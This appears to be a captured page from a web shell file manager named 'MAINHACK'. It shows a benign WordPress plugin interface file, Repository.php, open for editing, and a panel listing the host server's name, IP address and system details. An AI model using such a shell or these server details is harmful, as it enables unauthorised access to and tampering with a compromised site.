[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Repository.php
<?php /******************************************************************************* * Copyright (c) 2019, Code Atlantic LLC ******************************************************************************/ if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Interface PUM_Interface_Repository * * Interface between WP_Query and our data needs. Essentially a query factory. * * @package ForumWP\Interfaces */ interface PUM_Interface_Repository { /** * @param int $id * * @return WP_Post|PUM_Abstract_Model_Post */ public function get_item( $id ); /** * @param int $id * * @return bool */ public function has_item( $id ); /** * @param array $args * * @return WP_Post[||PUM_Abstract_Model_Post[] */ public function get_items( $args = [] ); /** * @param array $data * * @return WP_Post|PUM_Abstract_Model_Post */ public function create_item( $data ); /** * @param int $id * @param array $data * * @return WP_Post|PUM_Abstract_Model_Post */ public function update_item( $id, $data ); /** * @param int $id * * @return bool */ public function delete_item( $id ); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server.dijitaldukkanim.com.tr
Server IP: 104.247.168.220
PHP Version: 8.1.33
Server Software: Apache
System: Linux server.dijitaldukkanim.com.tr 4.18.0-553.105.1.el8_10.x86_64 #1 SMP Tue Feb 17 05:17:39 EST 2026 x86_64
HDD Total: 492.3 GB
HDD Free: 180.61 GB
Domains on IP: N/A (Requires external lookup)
System Features